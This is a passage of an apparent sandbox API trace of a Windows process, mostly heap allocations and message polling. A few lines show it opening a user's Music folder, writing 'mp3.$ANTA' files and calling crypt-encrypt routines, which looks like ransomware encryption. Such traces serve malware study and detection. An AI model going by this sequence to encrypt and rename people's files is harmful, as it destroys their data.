Flags=0x0, Size=0x8) returned 0x43e2420 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0110.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0110.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0110.437] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0110.437] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0110.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0110.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0110.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0110.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431da28 [0110.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0110.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0110.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0110.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431da28 | out: hHeap=0x1780000) returned 1 [0110.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0110.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0110.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0110.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0110.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0110.439] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0110.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0110.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0110.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0110.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0110.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0110.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0110.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0110.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.439] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\gXtG5sqySgJuIPIsH.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\gxtg5sqysgjuipish.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0110.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0110.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0110.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0110.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0110.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0110.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0110.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.440] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0110.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0110.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0110.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0110.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0110.440] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0110.440] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0110.440] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0110.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0110.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0110.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0110.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0110.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0110.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0110.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0110.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e00020 [0110.444] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0110.444] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0110.446] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x2fb3, lpOverlapped=0x0) returned 1 [0110.446] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0110.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0110.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0110.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12fb3) returned 0x4516010 [0110.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e00020 | out: hHeap=0x1780000) returned 1 [0110.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0110.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0110.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0110.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0110.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12fb3) returned 0x4528fd0 [0110.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0110.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.450] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0110.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0110.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12fb3) returned 0x4516010 [0110.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0110.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0110.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.450] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0110.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0110.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0110.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0110.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0110.450] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0110.451] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0110.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0110.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12fb3) returned 0x4516010 [0110.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2450 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0110.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0110.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2390 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0110.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca118 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12fb3) returned 0x499a008 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0110.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0110.452] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0110.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0110.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0110.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0110.453] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0110.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0110.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0110.453] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0110.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0110.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0110.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ed8 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0110.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0110.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0110.454] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0110.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0110.454] RtlAllocateHeap 